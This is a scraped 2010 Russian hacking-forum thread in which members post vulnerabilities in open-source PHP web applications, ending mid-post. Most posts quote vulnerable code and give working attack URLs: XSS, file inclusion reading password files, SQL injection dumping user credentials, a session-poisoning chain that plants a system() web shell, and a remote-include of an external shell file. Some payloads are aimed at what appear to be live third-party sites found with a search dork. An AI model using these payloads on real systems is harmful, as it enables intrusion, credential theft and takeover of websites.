Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.02.2010, 23:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Andy's PHP Knowledgebase v0.94.2
http://aphpkb.org/
forgot_password.php
PHP код:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/forgot_password.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
keysearch.php
PHP код:
if($_REQUEST['keyword_list']){
$keyword_list = escdata($_REQUEST['keyword_list']);
} else {
$keyword_list = 'nothing';
}
...
// If it's not the first page, make a Previous button.
if ($current_page != 1) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start - $display) . '&np=' . $num_pages . '">Previous</a> ';
}
// Make all the numbered pages.
for ($i = 1; $i <= $num_pages; $i++) {
if ($i != $current_page) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . (($display * ($i - 1))) . '&np=' . $num_pages . '">' . $i . '</a> ';
} else {
echo $i . ' ';
}
}
// If it's not the last page, make a Next button.
if ($current_page != $num_pages) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start + $display) . '&np=' . $num_pages . '">Next</a>';
}
pXSS
http://localhost/aphpkb/keysearch.php
post keyword_list=1<script>alert(121212)</script>
-------------------------------------------------------------
login.php
PHP код:
<p>User Name:<br /><input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/login.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
q.php
PHP код:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
echo "<p>Question:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/q.php
post article=1<div+style+STYLE="width:expression(alert( 121212))%3B">&aid=111&submit=Submit%20Question
-------------------------------------------------------------
register.php
PHP код:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>First Name:<br /> <input type="text" name="first_name" size="15" maxlength="15" value="<?php if (isset($_POST['first_name'])) echo $_POST['first_name']; ?>" /></p>
<p>Last Name:<br /> <input type="text" name="last_name" size="30" maxlength="30" value="<?php if (isset($_POST['last_name'])) echo $_POST['last_name']; ?>" /></p>
<p>Email Address:<br /> <input type="text" name="email" size="40" maxlength="40" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" /> </p>
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /> <small>Use only letters, numbers, and the underscore. Must be between 4 and 20 characters long.</small></p>
pXSS
http://localhost/aphpkb/register.php
post first_name=1>"><script%20%0a%0d>alert(121212)%3B</script
post last_name=1>"><script%20%0a%0d>alert(121212)%3B</script>
post email=1>"><script%20%0a%0d>alert(121212)%3B</script>
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
saa.php
PHP код:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
if($titlee) { echo "<p>Title: $titlee</p>"; }
echo "<p>Article:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/saa.php
post article=1<div+style="width:expression(alert(121212 ))%3B">
|
|
|
06.02.2010, 23:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Angora Guestbook v1.2.1
http://sourceforge.net/projects/aguestbook/
index.php
PHP код:
// Language settings
$langName = secureVar($_GET['l'], 'html');
if (! empty($langName))
$_SESSION['langName'] = $langName;
if (empty($_SESSION['langName']))
$langName = $config['guestbookLang'];
else
$langName = $_SESSION['langName'];
@include_once "languages/" . $langName . "/frontend.php";
classes/functions.php
PHP код:
function secureVar($var, $type) {
global $con;
switch ($type) {
case 'sql' :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
break;
case 'html' :
$var = htmlspecialchars($var, ENT_QUOTES);
break;
default :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
}
return $var;
}
LFI
mq=off
http://localhost/angora_1_2_1/guestbook/index.php?l=../../../../../../../../boot.ini%00
------------------------
admin/includes/content/phpinfo.php
PHP код:
if (@$magic != "0xDEADBEEF")
die("This file cannot be executed directly");
if (base64_decode($_SESSION['privilege']) != 1) {
$error = new Error($lang['noPermission']);
die($error->showError());
}
ob_start();
phpinfo();
phpinfo
http://localhost/angora_1_2_1/guestbook/admin/includes/content/phpinfo.php?magic=0xDEADBEEF&_SESSION[privilege]=MQ==
|
|
|
|
07.02.2010, 17:10
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Продукт: mycroCMS
Сайт: http://sourceforge.net/projects/mycrocms/
Path diclosing
Код:
http://localhost/mycrocms/?entry_id='
LFI
Участок кода в /admin/admin.php:
PHP код:
if ($admin=="error"){
include ("error.php");
}elseif ($userManager->isLoggedIn()) {
if ($admin == "") {
include ("dashboard.php");
} else {
if (file_exists("admin/$admin.php")) {
include ("admin/$admin.php");
} else {
die("File admin/$admin.php does not exist!");
}
}
$userManager->setLastTime(time());
} else {
if ($admin == "") {
include ("dashboard.php");
} else {
if (file_exists("admin/$admin.php")) {
include ("admin/$admin.php");
} else {
die("File admin/$admin.php does not exist!");
}
}
$userManager->setLastTime(time());
}
Отсюда инклуд. Эксплуатация:
Код:
http://localhost/mycrocms/?admin=../../../../../../etc/passwd%00
(права админа не нужны)
SQL-Injection
magiq_quotes=Off
Смотрим в \include\Categories.php:
PHP код:
function get_category_by_id($id) {
global $sql, $categories;
// use array if preloaded
if (is_array($categories)) {
$res = array_search_recursive('category_id', $id, $categories);
}
if (!is_array($res[0])) {
$res = $sql->read('categories', 'category_id', $id);
}
return $res[0];
}
Теперь ищем метод read в классе sql. Весь код кидать не буду, но фильтрации там нет.
PHP код:
$sql = "SELECT * FROM `$tablep` " . $where . $order . $limit;
$result = mysql_query($sql);
Пример эксплуатации:
Код:
http://localhost/mycrocms/?cat_id=1'+and+row(1,1)%3E(select+count(*),concat(version(),0x3a,floor(rand()*2))
+x+from+mysql.user+group+by+x+limit+1)+and+'a'='a
Code Execution
Заливка шелла в админке. Идём в меню Plugins, там есть стандартный плагин second для редактирования шаблонов (а на деле - любых
файлов). Активируем его, затем идём на http://localhost/mycrocms/?plugin=second&page=themes и редактируем любой файл.
|
|
|
|
08.02.2010, 10:26
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Pyrophobia CMS
Product : http://sourceforge.net/projects/pyrophobia/
Version : Pyrophobia CMS 2.1.3.1
Active XSS
1. Forum -- заходим в форум -- отправляем сообщение с текстом ( "><script>alert("xss");</script> )
2. PM -- Send User a PM -- отправляем текст ( '"/><script>alert("xss");</script> )
SQL injection
MySQL Version : 5.0.45 ---
Код:
http://localhost/[version]/?act=downloads/browsecategory&cat=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Код:
http://localhost/[version]/index.php?act=UCP&CODE=02&mssg=3'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
На данном движке их много 
LFI
milw0rm
|
|
|
|
10.02.2010, 23:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
BrewBlogger v2.3.1
http://www.brewblogger.net/
patch disclosure
http://localhost/brewblogger/includes/plug-ins.inc.php
----------------------
index.php
PHP код:
//image dir / SQL information and connect to MySQL server
require_once ('Connections/config.php');
//choose SQL table and set up functions to user authentication and
//navbar configuration for login/logout links
require ('includes/authentication_nav.inc.php'); session_start();
includes\authentication_nav.inc.php
$query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername);
$user = mysql_query($query_user, $brewing) or die(mysql_error());
$row_user = mysql_fetch_assoc($user);
$totalRows_user = mysql_num_rows($user);
Blind SQL
mq=off
http://localhost/brewblogger/index.php?loginUsername='+UNION+SELECT+(select+*+f rom(select+*+from(select+name_const((version()),1) d)+as+t+join+(select+name_const((version()),1)e)b) a)+--+
-----------------------
includes/db_connect_log.inc.php
PHP код:
/* set pagination variables */
if ($view == "limited") $display = 25;
elseif ($view == "all") $display = 9999999;
$pg = (isset($_REQUEST['pg']) && ctype_digit($_REQUEST['pg'])) ? $_REQUEST['pg'] : 1;
$start = $display * $pg - $display;
if (($row_pref['mode'] == "1") || (($row_pref['mode'] == "2") && ($filter == "all"))) {
mysql_select_db($database_brewing, $brewing);
$query_result = "SELECT count(*) FROM brewing";
if ($style != "all") $query_result .= " WHERE brewStyle='$style' AND"; else $query_result .= " WHERE";
$query_result .= " NOT brewArchive='Y'";
$result = mysql_query($query_result, $brewing) or die(mysql_error());
$total = mysql_result($result, 0);
$query_log = "SELECT * FROM brewing";
if ($style != "all") $query_log .= " WHERE brewStyle='$style' AND"; else $query_log .= " WHERE";
$query_log .= " NOT brewArchive='Y'";
$query_log .= " ORDER BY $sort $dir LIMIT $start, $display";
$sort слешируется ранее,
PHP код:
includes/url_variables.inc.php
$sort = "brewDate";
if (isset($_GET['sort'])) {
$sort = (get_magic_quotes_gpc()) ? $_GET['sort'] : addslashes($_GET['sort']);
}
$display никак не фильтруется. Хочется получить limit union select но мешает order by, поэтому только
Blind SQL
http://localhost/brewblogger/index.php?page=brewBlogList&&sort=(select+*+from(s elect+*+from(select+name_const((version()),1)d)+as +t+join+(select+name_const((version()),1)e)b)a)
----------------------
sections.entry.inc.php
PHP код:
$dbTable = "brewing";
if (isset($_GET['dbTable'])) {
$dbTable = (get_magic_quotes_gpc()) ? $_GET['dbTable'] : addslashes($_GET['dbTable']);
}
if ($action == "default") {
$style = "default";
if (isset($_GET['style'])) {
$style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']);
}
}
else
$style = $_POST['style'];
if (($action == "verify") || ($action == "print")) {
$name = $_POST['name'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$homePhone = $_POST['homePhone'];
$workPhone = $_POST['workPhone'];
$email = $_POST['email'];
$brewClub = $_POST['brewClub'];
$brewName = $_POST['brewName'];
$still = $_POST['still'];
$dry = $_POST['dry'];
$hydromel = $_POST['hydromel'];
$petillant = $_POST['petillant'];
$semi = $_POST['semi'];
$standard = $_POST['standard'];
$sweet = $_POST['sweet'];
$sparkling = $_POST['sparkling'];
$sack = $_POST['sack'];
$special = $_POST['special'];
$waterTreatment = $_POST['waterTreatment'];
$yeastLiquid = $_POST['yeastLiquid'];
$yeastDried = $_POST['yeastDried'];
$starter = $_POST['starter'];
$yeastNutrients = $_POST['yeastNutrients'];
$carbonation = $_POST['carbonation'];
$volumeC02 = $_POST['volumeC02'];
$primingSugar = $_POST['primingSugar'];
$bottlingDate = $_POST['bottlingDate'];
$finingsType = $_POST['finingsType'];
$finingsAmount = $_POST['finingsAmount'];
}
mysql_select_db($database_brewing, $brewing);
$query_log = sprintf("SELECT * FROM $dbTable WHERE id = '%s'", $id);
$log = mysql_query($query_log, $brewing) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);
$query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style);
SQL
mq=off
http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=defau lt
post
style=-1' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,unh ex(hex(concat_ws(0x3a,user_name,password))) from users --
pXSS
для полей
name
address
city
state
zip
homePhone
workPhone
email
brewClub
brewName
still
dry
hydromel
petillant
semi
standard
sweet
sparkling
sack
special
waterTreatment
yeastLiquid
yeastDried
starter
yeastNutrients
carbonation
volumeC02
primingSugar
bottlingDate
finingsType
finingsAmount
по типу
http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=defau lt
post
city=<script>alert(121212)</script>
Последний раз редактировалось nikp; 10.02.2010 в 23:58..
|
|
|
|
11.02.2010, 21:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
php-addressbook v5.4.6 - r276
http://sourceforge.net/projects/php-addressbook/
group.php
PHP код:
echo "<div class='msgbox'>Users added.<br /><i>Go to <a href='./?group=$group_name'>group page \"$group_name\"</a>.</i></div>";
...
<form accept-charset="utf-8" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
pXSS
http://localhost/addressbookv5.4.6/index.php?group=1<script>alert(121212)</script>
pXSS
mq=off
http://localhost/addressbookv5.4.6/group.php/>"><script>alert(121212)</script>
---------------------
include/dbconnect.php
PHP код:
$get_vars = array( 'id' );
foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = intval($_GET[$get_var]);
} elseif(isset($_POST[$get_var])) {
${$get_var} = intval($_POST[$get_var]);
} else {
${$get_var} = null;
}
}
echo $id, "<br />";
// Copy only used variables into global space.
$get_vars = array( 'searchstring', 'alphabet', 'group', 'resultnumber'
, 'submit', 'update', 'delete'
, 'new', 'add', 'remove', 'edit' );
foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = mysql_real_escape_string($_GET[$get_var], $db);
} elseif(isset($_POST[$get_var])) {
${$get_var} = mysql_real_escape_string($_POST[$get_var], $db);
} else {
${$get_var} = null;
}
}
...
// To run the script on systeme with "register_globals" disabled,
// import all variables in a bit secured way: Remove HTML Tags
foreach($_REQUEST as $key => $value)
{
// Allow all tags in headers and footers
if($key == "group_header" || $key == "group_footer"){
${$key} = $value;
// Handle arrays
} elseif(is_array($value)) {
foreach($value as $entry)
{
${$key}[] = strip_tags($entry);
}
// Handle the rest
} else {
// ${$key} = htmlspecialchars($value); --chatelao-20071121, doesn't work with Chinese Characters
${$key} = strip_tags($value);
}
// TBD: prevent SQL-Injection
}
...
// ------------------- Group query handling ------------------------
//
$select_groups = "SELECT groups.*
, parent_groups.group_name parent_name
, parent_groups.group_id parent_id
FROM $table_groups AS groups
LEFT JOIN $table_groups AS parent_groups
ON groups.group_parent_id = parent_groups.group_id";
group.php
PHP код:
// Open for Editing
else if($edit || $id)
{
if($edit) $id = $selected[0];
if(! $read_only)
{
$result = mysql_query("$select_groups WHERE groups.group_id=$id",$db);
SQL
http://localhost/addressbookv5.4.6/group.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9+--+
-------------------------
edit.php
PHP код:
else if($id)
{
if(! $read_only)
{
$result = mysql_query("SELECT * FROM $base_from_where AND $table.id=$id",$db);
SQL
http://localhost/addressbookv5.4.6/edit.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23+--+
Последний раз редактировалось nikp; 11.02.2010 в 22:02..
|
|
|
|
18.02.2010, 22:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
cms chicomas Ver : 2.0.4
http://sourceforge.net/projects/chicomas/
functions.php
PHP код:
function SetLanguage() {
global $defaultlanguage;
$obj_language = new CLanguage();
$obj_languagearray = new CLanguageArray();
$obj_languageengine = new CLanguageEngine();
if (!$_REQUEST['lang']){
// No change request of language
if (!session_is_registered("lang")){
//No Registered
$lang = $defaultlanguage;
session_register("lang");
$_SESSION['lang'] = $lang;
}
else{
//Registered
}
}
else{
//Change request of language
$lang = $_REQUEST['lang'];
$obj_language = $obj_languageengine->GetLanguage($lang);
if ($obj_language!=null){
if (session_is_registered("lang")){
$_SESSION['lang'] = $lang;
}
else{
if ($lang =="")
$lang = $defaultlanguage;
session_register("lang");
}
}
}
$lang = $_SESSION['lang'];
switch (strtolower($lang)){
default:
case "tr":
$charset = "iso-8859-9";
break;
case "en":
$charset = "iso-8859-1";
break;
case "de":
$charset = "iso-8859-1";
break;
}
if (session_is_registered("charset")){
$_SESSION['charset'] = $charset;
}
else{
if ($charset =="")
$charset = "iso-8859-9";
session_register("charset");
}
//Include Language File
include("languages/".strtolower($_SESSION['lang'])."/language.php");
}
Если $obj_language = $obj_languageengine->GetLanguage($lang); вернет не пустой результат,
значение $lang = $_REQUEST['lang']; занесется в сессию и затем проинклудится
include("languages/".strtolower($_SESSION['lang'])."/language.php");
смотрим
objects/obj_languages.php
PHP код:
class CLanguageEngine {
function GetLanguages($active){
$o_dataaccess = new CDataAccess();
return $o_dataaccess->GetLanguages($active);
objects/obj_dataaccess.php
PHP код:
function GetLanguage($lang) {
$sql = "SELECT * FROM languages ";
$sql .= "WHERE lang='".strtolower($lang)."' ";
$sql .= "AND active='1'";
//echo "SQL:".$sql."<br>";
$db = new db();
$db->db_connect();
if ($db->is_connected()){
$db->db_query($sql);
while ($row = $db->get_row()) {
$o_language = new CLanguage($row);
}
$db->db_disconnect();
}
return $o_language;
}
при mq=off
SQL
http://localhost/chicomas/index.php?lang=en'+union+select+1,2,3,4,version(), 6+--+
SQL+LFI
http://localhost/chicomas/index.php?lang=/../../../../../../../boot.ini%00'+union+select+1,2,3,4,5,6+--+
Shell
если нашли сессию, получаем шелл, например так: (используем два разных браузера)
opera, заливаем шелл в сессию
http://localhost/chicomas/index.php?lang='+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,5,6+--+
firefox, инклудим сессию
http://localhost/chicomas/index.php?lang=/../../../../../../../Server/PHP/TMP/sess_be2c81ce822253b08bfa181ee5b7cf9d%00'+union+se lect+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,version(),6+--+&pass=dir
-------------------
tools/mysqlbackuppro/index.php
PHP код:
/*
* Locale Setting
*/
$locale = gonxlocale::init();
if (!isset($locale) or $locale=="") {
$locale = $GonxAdmin["locale"];
}
require_once("locale/".$locale.".php");
tools/mysqlbackuppro/libs/locale.class.php
PHP код:
class gonxlocale{
/**
* Constructor
* @access protected
*/
function locale(){
}
/**
*
* @access public
* @return void
**/
function init(){
global $locale,$GonxAdmin,$HTTP_SESSION_VARS;
if (session_is_registered('gonxlocale') and !isset($_GET["locale"])) {
$locale = $HTTP_SESSION_VARS["gonxlocale"];
} elseif (!isset($_GET["locale"])) {
$locale = $GonxAdmin["locale"];
session_register('gonxlocale');
$gonxlocale = $locale;
} elseif (isset($_GET["locale"])) {
if (is_file("locale/".$_GET["locale"].".php")) {
session_register('gonxlocale');
$HTTP_SESSION_VARS["gonxlocale"] = $_GET["locale"];
}
}
return $locale;
}
LFI
mq=off
http://localhost/chicomas/tools/mysqlbackuppro/index.php?locale=../../../../../../boot.ini%00
Последний раз редактировалось nikp; 19.02.2010 в 20:48..
|
|
|
|
21.02.2010, 01:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
AdaptCMS Lite v1.5 - NEW
www.adaptcms.com
pXSS
mq=off
http://localhost/adaptcms_lite_1.5/index.php
post
skin=1>"><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/?cat=1'+><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/index.php?view=redirect&url=1'+><script>alert(1212 12);</script>
http://localhost/adaptcms_lite_1.5/index.php/>'><script>alert(121212)</script>
-----------------------
index.php
PHP код:
$_GET['id'] = str_replace("/","",stripslashes(check($_GET['id'])));
$sql = mysql_query("SELECT * FROM ".$pre."pages WHERE url = '".$_GET['id']."'");
functions.php
PHP код:
function check($val) {
// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
// this prevents some character re-spacing such as <java\0script>
// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
$val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val);
// straight replacements, the user should never need these since they're normal characters
// this prevents like <IMG SRC=@avascript:alert('XSS')>
$search = 'abcdefghijklmnopqrstuvwxyz';
$search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$search .= '1234567890!@#$%^&*()';
$search .= '~`";:?+/={}[]-_|\'\\';
for ($i = 0; $i < strlen($search); $i++) {
// ;? matches the ;, which is optional
// 0{0,7} matches any padded zeros, which are optional and go up to 8 chars
// @ @ search for the hex values
$val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
// @ @ 0{0,7} matches '0' zero to seven times
$val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
}
// now the only remaining whitespace attacks are \t, \n, and \r
$ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base', 'img');
$ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
$ra = array_merge($ra1, $ra2);
$found = true; // keep replacing as long as the previous round replaced something
while ($found == true) {
$val_before = $val;
for ($i = 0; $i < sizeof($ra); $i++) {
$pattern = '/';
for ($j = 0; $j < strlen($ra[$i]); $j++) {
if ($j > 0) {
$pattern .= '(';
$pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?';
$pattern .= '|(�{0,8}([9][10][13]);?)?';
$pattern .= ')?';
}
$pattern .= $ra[$i][$j];
}
$pattern .= '/i';
$replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
$val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
if ($val_before == $val) {
// no replacements were made, so exit the loop
$found = false;
}
}
}
return strip_tags($val, "<p><a><font><b><i><u><span><em><div><li><ul><ol><center><blockquote>");
}
SQL
mq=off
http://localhost/adaptcms_lite_1.5/?view=page&id=-1'+union+select+1,user(),3,version(),5,6+--+
-------------------------------------
index.php
PHP код:
...
if ($_GET['field'] or $_GET['data']) {
$sql = mysql_query("SELECT * FROM ".$pre."fielddata WHERE".$fddata." ORDER BY `id` DESC".$lim);
} else {
if ($_GET['abc']) {
if ($_GET['cat']) {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);
} else {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);
}
} else {
if ($_GET['cat']) {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = ''".$adate." ORDER BY `id` DESC".$lim);
} else {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = ''".$adate." ORDER BY `id` DESC".$lim);
}
}
}
while($r = mysql_fetch_array($sql)) {
unset($data, $datas, $pab, $rab, $name1, $link1, $n, $m, $y, $x, $i, $id, $name, $relations_id, $relations_sec, $s, $fetch, $get, $dats, $fname, $lid, $lids, $b, $sqlst, $k, $data23, $check);
...
$pab[0] = "{link}";
$pab[1] = "{date}";
$pab[2] = "{story}";
$pab[3] = "{comments}";
$pab[4] = "{cnum}";
$pab[5] = "{pcomment}";
$pab[6] = "{author}";
$pab[7] = "{section}";
$pab[8] = "{cat}";
$pab[9] = "{url}";
$pab[10] = "{title}";
....
$pab[30] = "{".$r[section]."_name}";
$pab[31] = "{".$r[section]."_username}";
$pab[32] = "{".$r[section]."_id}";
$pab[33] = "{".$r[section]."_views}";
$pab[34] = "{".$r[section]."_votes}";
$pab[35] = "{".$r[section]."_social_icons}";
...
// start - custom fields
$name = "";$data = "";$row = "";
$sql_cf = mysql_query("SELECT * FROM ".$pre."fields WHERE cat = '".$r[section]."' OR cat = 'user-profile'");
while ($row = mysql_fetch_array($sql_cf)) {
$name = "$row[name]";
$data = mysql_fetch_row(mysql_query("SELECT data FROM ".$pre."fielddata WHERE fname = '".$name."' AND aid = '".$r[id]."'"));
$fdata[$name] = $data[0];
if ($data[0]) {
$n = $n + 1;
$pab[$n] = "{".$name."}";
$n = $n + 1;
$pab[$n] = "{".$r[section]."_".$name."}";
$m = $m + 1;
if ($row[type] == "textarea") {
$rab[$m] = parse_text($data[0]);
$m = $m + 1;
$rab[$m] = parse_text($data[0]);
} else {
$rab[$m] = stripslashes(html_entity_decode($data[0]));
$m = $m + 1;
$rab[$m] = stripslashes(html_entity_decode($data[0]));
}
} else {
$n = $n + 1;
$pab[$n] = "{".$name."}";
$n = $n + 1;
$pab[$n] = "{".$r[section]."_".$name."}";
$m = $m + 1;
$rab[$m] = "";
$m = $m + 1;
$rab[$m] = "";
}
}
// end - custom fields
...
eval (" ?>" . str_replace($pab, $rab, stripslashes($temp[0])) . " <?php ");
...
Выбирается шаблон ($temp[0]) и в нем поля (массив $pab) заменяются на конкретное содержание (массив $rab).
Чтобы выполнить свою команду, нужно добавить в массивы по элементу, где
$pab[400] = "{cat}"; ( такое поле есть в шаблоне $temp[0] )
$rab[400] = "php code"; (наша команда или скрипт)
этому препятсвует unset
unset($data, $datas, $pab, $rab, ...);
Приходится использовать unset багу.
сформируем hash_del_key для php5
для pab = 2090607416
для rab = 2090679290
Eval
register_globals = On
версия php, уязвимая для UNSET WHACKING
http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090607416[400]=1&2090679290[400]=1
http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090679290=1
Последний раз редактировалось nikp; 21.02.2010 в 20:48..
|
|
|
|
23.02.2010, 22:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
cms jetbox
http://sourceforge.net/projects/jetboxone/
dork:"Powered by Jetbox CMS ™"
Поддерживает УРЛ стандартного типа, но работает со своим
PHP код:
if ($use_standard_url_method==true) {
$url = explode("/",$url_to_split[1]); // Splits URL into array
---------------------------
phpinfo
http://localhost/jetbox/includes/phpinfo.php
http://www.js.mlc.edu.tw/php/jetbox/includes/phpinfo.php
---------------------------
index.php
PHP код:
if (isset($view)) {
$dodefaultpage=false;
$sql2="SELECT * FROM navigation WHERE view_name='".$view."'";
$r2 = mysql_prefix_query($sql2) or die(mysql_error()." q: ".$sql2."<br /> Line: ".__LINE__." <br/>File: ".__FILE__);
if ($ra2 = mysql_fetch_array($r2)){
//echo $ra2["file_name"];
include($ra2["file_name"]);
}
SQL+LFI
mq=off
rg=on
http://localhost/jetbox/?view=1'+union+select+1,"/boot.ini%",3,4,5,6,7,8,9,10,11,12+--+
http://www.egyptiancorner.org/ec/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6 ,7,8,9,10,11,12+--+
SQL+RFI
magic_quotes_gpc = Off
register_globals = On
allow_url_include = On
http://localhost/jetbox/?view=-1'+union+select+1,"http://www.site.com/shell.txt",3,4,5,6,7,8,9,10,11,12+--+
http://ghostwriterreviews.com/jetbox/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6 ,7,8,9,10,11,12+--+
----------------------------
blogs.php
PHP код:
...
if ($item<>'' && is_numeric($item)) {
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id AND struct.id=".$item;
}
elseif($option=='last10'){
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC LIMIT 10";
}
else{
